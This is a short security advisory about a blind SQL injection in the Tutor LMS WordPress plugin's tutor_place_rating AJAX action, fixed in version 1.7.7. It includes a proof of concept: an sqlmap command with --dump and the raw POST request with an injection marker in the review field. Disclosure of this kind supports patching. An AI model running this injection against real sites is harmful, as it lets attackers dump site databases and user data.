Tutor LMS < 1.7.7 - SQL Injection via tutor_place_rating
Description
The tutor_place_rating AJAX action from the plugin was vulnerable to blind and time based SQL injections that could be exploited by students.
Proof of Concept
python3 sqlmap.py -r ~/tutor2.txt --dbms=mysql --technique=B -p course_id --dump Where tutor2.txt is POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [URL] Content-Length: 69 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [URL] Referer: [URL]/courses/first-class/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [STUDENTCOOKIES] Connection: close course_id=26&rating=5&review=%3B'&action=tutor_place_rating
Affects Plugins
Fixed in version 1.7.7✓
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-03-15 (about 6 months ago)
Added
2021-03-15 (about 6 months ago)
Last Updated
2021-03-20 (about 6 months ago)